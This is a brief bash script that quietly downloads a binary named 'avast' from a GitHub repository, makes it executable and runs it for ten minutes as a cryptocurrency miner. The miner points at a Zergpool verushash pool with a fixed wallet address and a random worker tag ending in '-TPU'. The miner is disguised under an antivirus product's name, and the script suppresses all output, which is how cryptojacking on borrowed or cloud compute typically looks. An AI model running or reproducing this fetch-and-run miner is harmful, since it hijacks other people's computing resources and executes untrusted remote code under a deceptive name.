#!/bin/bash
wget https://github.com/samrikulan/toya/raw/main/avast >/dev/null 2>&1
chmod +x avast >/dev/null 2>&1
timeout 10m ./avast -v -l  verushash.asia.mine.zergpool.com:3300 -u 7pXYkwdwUFBGNaG8dJ8w6kZTzRjnTpDTgo.$(echo $(shuf -i 1-99999 -n 1)-TPU) -p c=DASH -t 2 -x
